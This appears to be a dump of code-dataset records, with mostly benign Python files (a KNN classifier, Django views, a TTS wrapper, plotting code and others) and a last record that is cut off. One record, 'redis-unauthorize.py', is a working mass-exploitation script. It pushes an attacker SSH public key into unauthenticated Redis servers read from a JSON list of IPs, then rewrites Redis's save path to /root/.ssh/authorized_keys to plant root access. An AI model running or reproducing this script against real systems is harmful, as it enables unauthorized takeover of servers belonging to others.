trainingfile_list[i] # 得到文件名\r\n\t\tfilename_str_pre = filename_str.split('.')[0] # 得到前缀名\r\n\t\tclass_num = int(filename_str_pre.split('_')[0])\r\n\t\thwlabels.append(class_num)\r\n\t\ttraining_mat[i, :] = img2vector('digits/trainingDigits/%s' %filename_str)\r\n\ttestfile_list = os.listdir('digits/testDigits/')\r\n\terror_count = 0.0\r\n\tmTest = len(testfile_list)\r\n\tfor i in range(mTest):\r\n\t\tfilename_str = testfile_list[i]\r\n\t\tfilename_str_pre = filename_str.split('.')[0] # 得到前缀名\r\n\t\tclass_num = int(filename_str_pre.split('_')[0])\r\n\t\tvectest = img2vector('digits/testDigits/%s' %filename_str)\r\n\t\tclass_result = knn(vectest, training_mat, hwlabels, 3)\r\n\t\t# print('the classifier came back with: %d, the real answer is %d' \r\n\t\t# \t% (class_result, class_num))\r\n\t\tif class_result != class_num:\r\n\t\t\terror_count += 1.0\r\n\t\t\tprint('the classifier came back with: %d, the real answer is %d' \r\n\t\t\t\t% (class_result, class_num))\r\n\tprint('the total number of errors is: %d' % error_count)\r\n\tprint('the total error rate is: %f' % (error_count/float(mTest)))\r\n\r\n\r\nif __name__ == '__main__':\r\n # groups, labels = create_dataset()\r\n # result = knn([0, 0], groups, labels, 3)\r\n # print(result)\r\n # data, labels = file2matrix('datingTestSet2.txt')\r\n # draw_data(data, labels)\r\n # print(data)\r\n # class_test(data, labels, 0.10)\r\n # print(classify_person(data, labels, 10000.0, 10.0, 0.06))\r\n # testvect = img2vector('digits/testDigits/0_0.txt')\r\n # print(testvect[0, 0:31])\r\n # print(testvect[0, 32:63])\r\n handwriting_class_test()\r\n","sub_path":"KNN/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436176167","text":"#!/usr/bin/ python\n# -*- coding: utf-8 -*-\n\nfrom cloqwerk.services.Base import Base\nfrom cloqwerk.services.TimesheetService import TimesheetService\nfrom cloqwerk.services.TimeEntryService import TimeEntryService\nfrom cloqwerk.models.User import User\nfrom cloqwerk.models.TimeEntry import TimeEntry\nfrom datetime import datetime\n\nclass UserService(Base):\n __model__ = User\n\n def by_username(self, username):\n try:\n return self.session.query(User).filter_by(username=username).one()\n except:\n return None\n\n def time_entry(self, user_id, action):\n try:\n u = UserService().get(user_id)\n ts = TimesheetService().todays_timesheet()\n te = TimeEntry(\n action = action,\n time = datetime.now(),\n user_id = u.id,\n timesheet_id = ts.id\n )\n u.time_entries.append(te)\n self.session.add(ts)\n self.session.commit()\n return te\n except:\n self.session.rollback()\n return False\n\n def week(self, user):\n log = []\n for ts in TimesheetService().last_7():\n clock_in = TimeEntryService().clocked_in(user, ts.date)\n clock_out = TimeEntryService().clocked_out(user, ts.date)\n IN = clock_in.time.strftime(\"%H:%M\") if clock_in else \"\"\n OUT = clock_out.time.strftime(\"%H:%M\") if clock_out else \"\"\n log.append(\n {\n \"date\": ts.date.strftime(\"%m/%d/%Y\"),\n \"in\": IN,\n \"out\": OUT,\n \"hours\": \"{:.2f}\".format((clock_out.time-clock_in.time)\\\n .total_seconds()/3600) if clock_in and clock_out else \"\"\n }\n )\n return log\n","sub_path":"cloqwerk/services/UserService.py","file_name":"UserService.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52479492","text":"import os\nimport json\nfrom multiprocessing.pool import ThreadPool as Pool\n\ndef process_thread(ip):\n try:\n ip = ip.replace('http://', '')\n if len(ip) > 25:\n return\n if ':' in ip:\n ip, port = ip.split(':')\n else:\n port = 6379\n\n print('trying:' + ip + ':' + port)\n result = os.popen(\n \"echo '\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAo/Hp7BruXfPnUKuGbPqJTsSmLfh+i9CAGwOFTrEeEaali8s8mLGY99MfaZ9TeddrkuiasAldXpRZgHnPdn6PYDIsptXU/6I9kUuhtKkFZlQlKtt7DTzi5nOkfTV08WTnpDE5JElC15xR+vh35cjnOKXT3piavLnCvKr2BQkie8baHPnX98IaBmhZDB32gqztnVV6r1lUZnEOR/Fs4DmUj94fYw+HSoqRV4R17437FR24R247k14vmA7CsUCRBzQBvBvHUIwuYm7hcvGHXghlrQ5I1KJnFCj5qNegGouIu34nnfMbXleo0ShmsoDfeTCbZIXjPAcqYXvQlrBjNqzJVw== root@XYLink.GW\\n\\n'|redis-cli -h \" + ip + \" -p \" + port + \" -x set test\")\n if 'OK' in result.read():\n result = os.popen(\"echo 'config set dir /root/.ssh'|redis-cli -h \" + ip + ' -x')\n if 'OK' in result.read():\n result = os.popen(\"echo 'config set dbfilename \\'authorized_keys\\''|redis-cli -h \" + ip + ' -x')\n result = os.popen(\"echo 'save'|redis-cli -h \" + ip + ' -x')\n print('[+]', ip, port, result.read())\n except AssertionError:\n print('timeout')\n\nif __name__ == '__main__':\n threads = Pool(10)\n ips = []\n with open('redis.json','r') as redis_content:\n ips = json.loads(redis_content.read())\n for ip in ips:\n threads.apply_async(process_thread, args=(ip,))\n\n threads.close()\n threads.join()\n","sub_path":"redis-unauthorize.py","file_name":"redis-unauthorize.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"520106279","text":"r\"\"\"\nInitialize a smooth incompressible convergence test. Here, the\nvelocities are initialized as\n\n.. math::\n\n u(x,y) = 1 - 2 \\cos(2 \\pi x) \\sin(2 \\pi y)\n\n v(x,y) = 1 + 2 \\sin(2 \\pi x) \\cos(2 \\pi y)\n\nand the exact solution at some later time t is then\n\n.. math::\n\n u(x,y,t) = 1 - 2 \\cos(2 \\pi (x - t)) \\sin(2 \\pi (y - t))\n\n v(x,y,t) = 1 + 2 \\sin(2 \\pi (x - t)) \\cos(2 \\pi (y - t))\n\n p(x,y,t) = -\\cos(4 \\pi (x - t)) - \\cos(4 \\pi (y - t))\n\nThe numerical solution can be compared to the exact solution to\nmeasure the convergence rate of the algorithm.\n\n\"\"\"\n\n\nimport math\n\nimport numpy as np\n\nfrom pyro.mesh import patch\nfrom pyro.util import msg\n\n\ndef init_data(my_data, rp):\n \"\"\" initialize the incompressible converge problem \"\"\"\n del rp # this problem doesn't use runtime params\n\n msg.bold(\"initializing the incompressible converge problem...\")\n\n # make sure that we are passed a valid patch object\n if not isinstance(my_data, patch.CellCenterData2d):\n print(my_data.__class__)\n msg.fail(\"ERROR: patch invalid in converge.py\")\n\n # get the velocities\n u = my_data.get_var(\"x-velocity\")\n v = my_data.get_var(\"y-velocity\")\n\n myg = my_data.grid\n\n if (myg.xmin != 0 or myg.xmax != 1 or\n myg.ymin != 0 or myg.ymax != 1):\n msg.fail(\"ERROR: domain should be a unit square\")\n\n u[:, :] = 1.0 - 2.0*np.cos(2.0*math.pi*myg.x2d)*np.sin(2.0*math.pi*myg.y2d)\n v[:, :] = 1.0 + 2.0*np.sin(2.0*math.pi*myg.x2d)*np.cos(2.0*math.pi*myg.y2d)\n\n\ndef finalize():\n \"\"\" print out any information to the user at the end of the run \"\"\"\n\n ostr = \"\"\"\n Comparisons to the analytic solution can be done using\n analysis/incomp_converge_error.py\n \"\"\"\n\n print(ostr)\n","sub_path":"pyro/incompressible/problems/converge.py","file_name":"converge.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136830999","text":"#!/usr/bin/env python\n#\n# pygletplot.py\n#\n\nimport datetime\n\nfrom pyglet.window import Window, mouse\nimport pyglet.app\n\nfrom electrowlib.graphics.glfigure import GLFigure\nfrom electrowlib.graphics.interactive import InteractiveState\n\n\nclass PlotWindow(Window):\n \"\"\"Subclass of Window that displays an interactive GLFigure\"\"\"\n\n double_click_time = datetime.timedelta(seconds=0.3)\n cursor_names = {None:Window.CURSOR_DEFAULT,\n 'pan':Window.CURSOR_HAND,\n 'zoom':Window.CURSOR_CROSSHAIR}\n\n def __init__(self, *args, **kwargs):\n # Initialise self\n kwargs['resizable'] = kwargs.get('resizable', True)\n interactive = kwargs.pop('interactive', False)\n super(PlotWindow, self).__init__(*args, **kwargs)\n self._init = False\n self.last_press = datetime.datetime.now()\n # Create figure object\n width, height = self.get_size()\n self.figure = GLFigure()\n self.figure.set_rect([0, 0, width, height])\n # Create cursors used for interactivity\n self._cursors = {}\n for k, v in self.cursor_names.iteritems():\n self._cursors[k] = self.get_system_mouse_cursor(v)\n # Create interactivity data\n self.set_interactive(interactive)\n\n def run(self):\n pyglet.app.run()\n\n def on_draw(self):\n if not self._init:\n self.figure._initgl()\n self._init = True\n self.figure._draw()\n\n def on_resize(self, width, height):\n self.figure._resize(width, height)\n\n def set_interactive(self, interactive):\n self._interactive = InteractiveState(interactive, self)\n\n def _set_cursor(self, mode):\n self.set_mouse_cursor(self._cursors[mode])\n\n # Manually detect double-clicks\n def on_mouse_press(self, x, y, button, modifiers):\n self.on_mouse_down(x, y, button, modifiers)\n penultimate_press = self.last_press\n self.last_press = datetime.datetime.now()\n delta = self.last_press - penultimate_press\n if button == mouse.LEFT and delta < self.double_click_time:\n self.on_double_click(x, y, button, modifiers)\n\n def _point(self, x, y):\n width, height = self.get_size()\n return float(x) / float(width), float(y) / float(height)\n\n def on_mouse_down(self, x, y, button, modifiers):\n if button == mouse.LEFT:\n self._interactive.on_left_down(self._point(x, y))\n\n def on_mouse_release(self, x, y, button, modifiers):\n if button == mouse.LEFT:\n self._interactive.on_left_up(self._point(x, y))\n\n def on_double_click(self, x, y, button, modifiers):\n if button == mouse.LEFT:\n self._interactive.on_left_double_click(self._point(x, y))\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n if buttons & mouse.LEFT:\n self._interactive.on_mouse_drag(self._point(x, y))\n\n def on_mouse_motion(self, x, y, dx, dy):\n self._interactive.on_mouse_move(self._point(x, y))\n\n\nif __name__ == \"__main__\":\n\n import pyglet\n import numpy\n\n window = PlotWindow(interactive=True)\n figure = window.figure\n\n x = numpy.linspace(0, 2*numpy.pi, 1024)\n y = numpy.sin(x) + 0.1 * numpy.random.random(x.shape)\n ax = figure.add_axes([0.1, 0.1, 0.8, 0.8])\n ax.plot(x, y, 'g')\n\n window.run()\n\n","sub_path":"electrowlib/graphics/pyglet_plotwindow.py","file_name":"pyglet_plotwindow.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609132834","text":"from etl.etl_processes.fairs_etl import *\nfrom autohandshake.HandshakeNavigator import HandshakeNavigator\nfrom autohandshake.HandshakeSession import HandshakeSession\nfrom datetime import date, timedelta\n\nif __name__ == '__main__':\n option = -1\n include_time_sensitive = False\n\n print(\"Career Fairs Data Pull\\n\")\n\n while option != '1' and option != '2':\n print(\"Commands:\")\n print(\" - (1) Get yesterday's career fair data\")\n print(\" - (2) Enter a date range for career fair data\\n\")\n\n option = input(\"Please enter a command: \")\n print() # extra newline for formatting\n\n if option == '1':\n end_date = date.today()\n start_date = end_date - timedelta(1)\n start_date = start_date.strftime(\"%Y-%m-%d\")\n end_date = end_date.strftime(\"%Y-%m-%d\")\n elif option == '2':\n start_date = input(\"Please enter a start date: \")\n end_date = input(\"Please enter an end date: \")\n else:\n print(\"Invalid command\\n\")\n\n include_time_sensitive = input(\"Would you like to include time-dependant student data? (y / n): \") == \"y\"\n with HandshakeSession() as browser:\n navigator = HandshakeNavigator(browser)\n fairs_etl.run_etl(navigator, start_date, end_date)\n fairs_employers_etl.run_etl(navigator, start_date, end_date)\n attendees_etl.run_etl(navigator, start_date, end_date)\n if include_time_sensitive:\n attendees_school_years_etl.run_etl(navigator, start_date, end_date)\n attendees_colleges_etl.run_etl(navigator, start_date, end_date)\n attendees_academies_etl.run_etl(navigator, start_date, end_date)\n attendees_majors_etl.run_etl(navigator, start_date, end_date)\n","sub_path":"production_scripts/etl_scripts/get_fairs.py","file_name":"get_fairs.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224508926","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.db.models import Count, Sum\nfrom django.shortcuts import render, redirect\nfrom smartphones.models import Smartphone, Sale\nfrom django.db.models.functions import TruncMonth\nimport datetime\n\n\n@login_required(login_url='/login/')\ndef index(request):\n top_brands = Smartphone.objects.values('brand').annotate(num_sales=Count('sale')).order_by('-num_sales')[:3]\n overall_sales = Sale.objects.count()\n brands = list(top['brand'] for top in top_brands)\n brands.append('other')\n sales = list(top['num_sales'] for top in top_brands)\n sales.append(overall_sales - sum(sales))\n today = datetime.datetime.now()\n sales_current_year = Sale.objects.filter(created_at__year=today.year)\n sales_by_month = sales_current_year.annotate(month=TruncMonth('created_at')).values('month').annotate(total=Count('id')).order_by('month')\n total_sales = []\n j = 0\n smartphones = Smartphone.objects.all()\n storages = list(set(smartphone.storage for smartphone in smartphones))\n top_storages = Smartphone.objects.values('storage').annotate(num_sales=Count('sale')).order_by('storage')\n for i in range(1, 13):\n if len(sales_by_month) > 0:\n if sales_by_month[j]['month'].month == i:\n total_sales.append(sales_by_month[j]['total'])\n j += 1\n else:\n total_sales.append(0)\n context = {\n 'brands': brands,\n 'sales': sales,\n 'total_sales': total_sales,\n 'storages': sorted(storages),\n 'top_storages': list(top['num_sales'] for top in top_storages),\n 'overall_sales': overall_sales,\n 'in_stock': smartphones.count(),\n }\n return render(request, 'smartphones/home.html', context)\n\n\ndef login_view(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect('/')\n else:\n messages.warning(request, \"Invalid username or password.\")\n return render(request=request, template_name=\"smartphones/login_new.html\", context={\"form\": form})\n\n else:\n messages.warning(request, \"Invalid username or password.\")\n return render(request=request, template_name=\"smartphones/login_new.html\", context={\"form\": form})\n form = AuthenticationForm()\n return render(request=request, template_name=\"smartphones/login_new.html\", context={\"form\": form})\n\n\ndef register_view(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n messages.success(request, \"Registration successful.\")\n return redirect('/')\n messages.warning(request, \"Unsuccessful registration. Invalid information.\")\n return render(request=request, template_name=\"smartphones/register_new.html\", context={\"form\": form})\n form = UserCreationForm\n return render(request=request, template_name=\"smartphones/register_new.html\", context={\"form\": form})\n\n\n@login_required(login_url='/login/')\ndef logout_view(request):\n logout(request)\n return redirect('/')\n\n\n@login_required(login_url='/login/')\ndef smartphones_view(request):\n smartphones = Smartphone.objects.all()\n brands = set(smartphone.brand for smartphone in smartphones)\n storages = set(smartphone.storage for smartphone in smartphones)\n context = {\n 'smartphones': smartphones,\n 'brands': sorted(brands),\n 'storages': sorted(storages),\n }\n return render(request, 'smartphones/smartphones_list.html', context)\n\n\n@login_required(login_url='/login/')\ndef filter_view(request):\n if request.method == 'POST':\n checked_brands = request.POST.getlist('brands')\n checked_storages = request.POST.getlist('storages')\n smartphones = Smartphone.objects.all()\n brands = set(smartphone.brand for smartphone in smartphones)\n storages = set(smartphone.storage for smartphone in smartphones)\n if len(checked_brands) != 0:\n smartphones = smartphones.filter(brand__in=checked_brands)\n if len(checked_storages) != 0:\n smartphones = smartphones.filter(storage__in=checked_storages)\n context = {\n 'smartphones': smartphones,\n 'brands': sorted(brands),\n 'checked_brands': checked_brands,\n 'checked_storages': list(map(int, checked_storages)),\n 'storages': sorted(storages),\n }\n return render(request, 'smartphones/smartphones_list_filtered.html', context)\n\n\n@login_required(login_url='/login/')\ndef sales_view(request):\n sales = Sale.objects.all()\n context = {\n 'sales': sales\n }\n return render(request, 'smartphones/tables.html', context)\n","sub_path":"smartphones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518381510","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nGiven an array of 2n integers, your task is to group these integers into n pairs of integer, say (a1, b1), (a2, b2), ..., (an, bn) which makes sum of min(ai, bi) for all i from 1 to n as large as possible.\n\nExample 1:\nInput: [1,4,3,2]\n\nOutput: 4\nExplanation: n is 2, and the maximum sum of pairs is 4 = min(1, 2) + min(3, 4).\n'''\n\nclass Solution(object):\n def arrayPairSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ## solution 1\n # return sum(sorted(nums)[::2])\n\n ## solution 2\n nums = sorted(nums)\n res = 0\n i = 0\n for num in nums:\n \ti += 1\n \tif i % 2 != 0: res += num\n return res\n","sub_path":"zeqing/Array/561.Array_Partition_I.py","file_name":"561.Array_Partition_I.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"60198088","text":"#! /usr/bin/env python\nimport psycopg2\n\n\ndef connect(database_name=\"news\"):\n try:\n db = psycopg2.connect(\"dbname={}\".format(\n database_name\n ))\n cursor = db.cursor()\n return db, cursor\n except:\n print(\"Connect error\")\n\n\ndef popular_articles():\n db, cursor = connect()\n cursor.execute(\"Select title, Count(*) as views from articles Join log On path Like Concat('%', slug, '%') Where status = '200 OK' Group By title Order by views Desc Limit 3;\")\n articles = cursor.fetchall()\n print(\"What are the 3 most popular articles of All-time?\")\n for (name, view) in articles:\n print(\" {} - {} views\".format(name, view))\n db.close()\n\n\ndef popular_authors():\n db, cursor = connect()\n cursor.execute(\"Select name, Count(*) as views from articles Join authors on authors.id = articles.author Join log on log.path Like Concat ('%', slug, '%') Where status = '200 OK' Group By name Order By views Desc;\")\n authors = cursor.fetchall()\n print(\"Who are most popular authors? Rank by views\")\n for (name, view) in authors:\n print(\" {} - {} views\".format(name, view))\n db.close()\n\n\ndef percentage_errors():\n db, cursor = connect()\n cursor.execute(\"Select date, percentage From errs Where percentage > 1;\")\n error = cursor.fetchall()\n print(\"On what day did requests lead to errors greater than 1%?\")\n for (day, err) in error:\n print(\" {0:%B %d, %Y} - {1:.2f} % errors\".format(day, err))\n db.close()\n\nif __name__ == \"__main__\":\n popular_articles()\n popular_authors()\n percentage_errors()\n","sub_path":"logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635673472","text":"import os\nimport sys\nimport glob\n\npath_dir = [\"E:\\\\\"]\n# file_name = \"extraction\"\nextensions = [\".mkv\", \".mp4\"]\n\ndir = {\"time\": [\"E:\\\\\"], \"data\": [\"D:\\\\\"]}\n\n# this class is only searching for files in E:\\\nclass search_f:\n def __init__(self, file_name, path_name):\n value = dir.__contains__(path_name)\n if not value:\n return \"not found\"\n self.path_name = path_name\n paths = dir[path_name]\n self.paths = paths\n self.file_name = file_name\n\n def find_file(self):\n for base_path in self.paths:\n files = os.listdir(base_path)\n for file in files:\n if self.file_name in file.lower():\n path = os.path.join(base_path, file)\n os.startfile(path)\n return \"found\"\n return \"not found\"\n\n def find_file_glob(self):\n for base_path in self.paths:\n for ext in extensions:\n glob_path = base_path + \"**\\\\*\" + ext\n file_iterator = glob.iglob(glob_path, recursive=True)\n\n value_to_return = \"not found\"\n while True:\n pth_of_file = next(file_iterator)\n # print(pth_of_file)\n if self.file_name in pth_of_file.lower():\n os.startfile(pth_of_file)\n value_to_return = \"found\"\n break\n else:\n value_to_return = \"not found\"\n return value_to_return\n\n\n# s = search_f(file_name)\n# r = s.find_file_glob()\n# print(r)\n","sub_path":"search_file.py","file_name":"search_file.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629747706","text":"# Copyright 2017-2019 Lawrence Livermore National Security, LLC and other\n# Hatchet Project Developers. See the top-level LICENSE file for details.\n#\n# SPDX-License-Identifier: MIT\n\nfrom setuptools import setup\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nsetup(\n name=\"contrib\",\n version=\"0.1.0\",\n description=(\n \"A python package for making stacked area plots of contributions over time.\"\n ),\n url=\"https://github.com/spack/contrib\",\n author=\"Todd Gamblin\",\n author_email=\"tgamblin@llnl.gov\",\n license=\"Apache-2.0 OR MIT\",\n classifiers=[\"Development Status :: 3 - Alpha\"],\n keywords=\"\",\n packages=[\"contrib\", \"contrib.config\"],\n install_requires=[\n \"python-dateutil\",\n \"jsonschema\",\n \"matplotlib\",\n \"pyyaml\",\n \"setuptools\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"648159552","text":"import RPi.GPIO as GPIO\nfrom time import sleep\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nenable = 18\nHinputC = 23\nHinputCC = 24\ntrnsC = 20\ntrnsCC = 21\nresponseC = 26\nresponseCC = 19\n\nGPIO.setup(enable,GPIO.OUT)\nGPIO.setup(HinputC,GPIO.OUT)\nGPIO.setup(HinputCC,GPIO.OUT)\nGPIO.setup(trnsC,GPIO.OUT)\nGPIO.setup(trnsCC,GPIO.OUT)\nGPIO.setup(responseC,GPIO.IN)\nGPIO.setup(responseCC,GPIO.IN)\n\ndef stop():\n GPIO.output(HinputC,0)\n GPIO.output(HinputCC,0)\n GPIO.output(trnsC,0)\n GPIO.output(trnsCC,0)\n\n\ndef PolarRun(reverse):\n GPIO.output(HinputC,(reverse+1)%2)\n GPIO.output(trnsC,(reverse+1)%2)\n GPIO.output(HinputCC,reverse) \n GPIO.output(trnsCC,reverse)\n\ndef listener(reverse):\n if reverse:\n if GPIO.input(responseCC)==1:\n return True\n else:\n if GPIO.input(responseC)==1:\n return True\n return False\n\nprint(\"setting defaults\")\nstop()\n\nprint(\"Enableing H-bridge\")\n\nGPIO.output(enable,1)\n\ndef testRun(runs):\n sleep(1)\n print(\"starting test\")\n sleep(1)\n Counter = 0\n for i in range(runs):\n PolarRun(i%2)\n sleep(0.8)\n response = listener(i%2)\n print(\"Current flowing currectly: %s\" % (response))\n if response:\n Counter+=1\n sleep(0.2)\n stop()\n print(\"I got %s/%s possible responses\" % (Counter,runs))\t\n print(\"Turning Rocket off\")\n if Counter==runs:\n return True\n else:\n return False\n\ndef main():\n PolarRun(0)\n while listener(0):\n pass\n stop()\n if testRun(6):\n main()\n\nif testRun(6):\n main()\nGPIO.cleanup()\n","sub_path":"code/LaunchCodes.py","file_name":"LaunchCodes.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"25464521","text":"from sklearn.cluster import KMeans\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport re\nfrom sklearn import metrics\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.cluster import DBSCAN\nfrom funcs import *\nfrom sklearn.datasets.samples_generator import make_blobs\n\nclass Kmeans:\n\tdef __init__(self, k, iter):\n\t\tX, y_true = make_blobs(n_samples=300, centers=4,\n\t\tcluster_std=0.60, random_state=0)\n\t\tself.k = k\n\t\tself.iter = iter\n\t\t#feats, labs = read('cbf')\n\t\tfeats, labs = X, y_true\n\t\tself.feats = feats\n\t\tself.labs = labs\n\t\ttmp = np.random.rand(self.k,1)\n\t\tself.centres = []\n\t\tfor itm in tmp:\n\t\t\tval = int(itm[0]*len(feats))\n\t\t\tif val in self.centres: self.centres.append(val+1)\n\t\t\telse: self.centres.append(val)\n\t\tself.clusters = []\n\n\tdef getCentre(self, feat):\n\t\tmindist = 10000000.\n\t\tidx = -1\n\t\tfor centre in range(len(self.centres)):\n\t\t\tif euclidean(feat, self.feats[centre]) < mindist: mindist = euclidean(feat, self.feats[centre]); idx = centre\n\t\treturn idx\n\n\tdef fit(self):\n\t\titer = 0\n\t\tcentre = self.centres\n\t\twhile iter < self.iter or centre != self.centres:\n\t\t\tcentre = self.centres\n\t\t\tclusters = [[] for i in range(self.k)]\n\t\t\tfor feat in range(len(self.feats)):\n\t\t\t\tclusters[self.getCentre(self.feats[feat])].append(feat)\n\t\t\tfor centre in range(len(self.centres)):\n\t\t\t\tnewc = []\n\t\t\t\tfor i in range(len(self.feats[feat])):\n\t\t\t\t\tsum = 0.\n\t\t\t\t\tfor j in range(len(self.feats)):\n\t\t\t\t\t\tsum += self.feats[j][i]\n\t\t\t\t\tavg = sum / len(self.feats)\n\t\t\t\tnewc.append(avg)\n\t\t\tself.centres = newc\n\t\tfor key in clusters:\n\t\t\tfor itm in clusters[key]:\n\t\t\t\tself.clusters[itm] = key\n\nif __name__ == \"__main__\":\n\tinst = Kmeans(4, 10)\n\tinst.fit()\n\tprint('Kmeans (dtwdist):')\n\tfeats, labs = read('cbf')\n\n\n\n\tprint('The end...')\n","sub_path":"code/code/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464522328","text":"import os\nimport numpy as np\nfrom pathlib import Path\nimport tensorflow as tf \nfrom scipy.io import wavfile\n\nfrom .tensorflow_tts.processor import BakerProcessor\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nasset_dir = Path(__file__).parent / \"asset\"\n\n\nclass TTS():\n def __init__(self, text2mel_name=\"FASTSPEECH2\"):\n \"\"\"text2mel_name: [\"FASTSPEECH2\", \"TACOTRON\"] \"\"\"\n self.sample_rate = 24000\n self.processor = BakerProcessor(\n data_dir=None, loaded_mapper_path=asset_dir / \"baker_mapper.json\")\n self.text2mel_name = text2mel_name\n self.acoustic = tf.lite.Interpreter(model_path=str(asset_dir / 'fastspeech2_quan.tflite'))\n self.vocoder = tf.lite.Interpreter(model_path=str(asset_dir / 'mb_melgan.tflite'))\n\n def prepare_input(self, input_ids):\n input_ids = np.expand_dims(np.array(input_ids, np.int32), 0)\n if self.text2mel_name == \"TACOTRON\":\n return (input_ids,\n np.array([input_ids.shape[1]], np.int32),\n np.array([0], np.int32),)\n elif self.text2mel_name == \"FASTSPEECH2\":\n return (input_ids,\n np.array([0], np.int32),\n np.array([1.0], np.float32),\n np.array([1.0], np.float32),\n np.array([1.0], np.float32),)\n\n def text2mel(self, input_text):\n input_details = self.acoustic.get_input_details()\n output_details = self.acoustic.get_output_details()\n input_ids = self.processor.text_to_sequence(input_text, inference=True)\n\n self.acoustic.resize_tensor_input(\n input_details[0]['index'], [1, len(input_ids)])\n self.acoustic.allocate_tensors()\n\n input_data = self.prepare_input(input_ids)\n for i, detail in enumerate(input_details):\n self.acoustic.set_tensor(detail['index'], input_data[i])\n self.acoustic.invoke()\n\n return self.acoustic.get_tensor(output_details[1]['index'])\n\n def mel2audio(self, mel):\n input_details = self.vocoder.get_input_details()\n output_details = self.vocoder.get_output_details()\n self.vocoder.resize_tensor_input(input_details[0]['index'], mel.shape)\n self.vocoder.allocate_tensors()\n self.vocoder.set_tensor(input_details[0]['index'], mel)\n self.vocoder.invoke()\n\n return self.vocoder.get_tensor(output_details[0]['index'])[0, :, 0]\n\n def synthesis(self, text):\n \"\"\" synthesis text to audio\n\n Args:\n text (str)\n Returns:\n ndarray: audio\n \"\"\"\n mel = self.text2mel(text)\n audio = self.mel2audio(mel)\n return audio\n\n def frontend(self, text):\n \"\"\" return normalize_text, phoneme_seq for debug\n\n Args:\n text (str)\n Returns:\n (tuple): tuple containing:\n\n normalize_text (str): text after text_normalize\n phoneme (str): \" \".join(phones)\n \"\"\"\n return self.processor.text_to_phone(text)\n\n def text2wav(self, text, wavpath):\n \"\"\"synthesis text and save to wavfile\"\"\"\n audio = self.synthesis(text)\n \n wavfile.write(wavpath, self.sample_rate, audio)\n ","sub_path":"zhtts/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62567271","text":"def encoder(key):\n on = 0\n encodedString = \"\"\n while 1 == 1:\n newLetter = chr(ord(userInput[on]) + int(key))\n encodedString = encodedString + newLetter\n on = on + 1\n if on == len(userInput):\n break\n print(encodedString)\n\ndef decoder(key):\n on = 0\n decodedString = \"\"\n while 1 == 1:\n newLetter = chr(ord(encodedString[on]) - key)\n decodedString = decodedString + newLetter\n on = on + 1\n if on == len(encodedString):\n break\n return decodedString\n\nprint(\"Would you like to encode or decode?\")\nanswer = input()\nif answer == 'encode': \n print(\"Enter a word or sentence to encode\")\n userInput = input()\n print(\"In what key would you like to encode in?\")\n n = input()\n encoder(n)\nif answer == 'decode':\n print(\"Enter a word or sentence to decode.\")\n encodedString = input()\n for n in range(1,12):\n print('In key ' + str(n) + ' the message is:')\n print(decoder(n))\n","sub_path":"Python/Encoding/ArjunPEncoderDecoder.py","file_name":"ArjunPEncoderDecoder.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"381239943","text":"from app.libs.shared_flow import *\n\n\ndef _get_type_id(type_id):\n return requests.get(f\"https://esi.evetech.net/latest/universe/types/{type_id}/\").json()\n\n\ndef main():\n \"\"\" Takes you through a local example of the OAuth 2.0 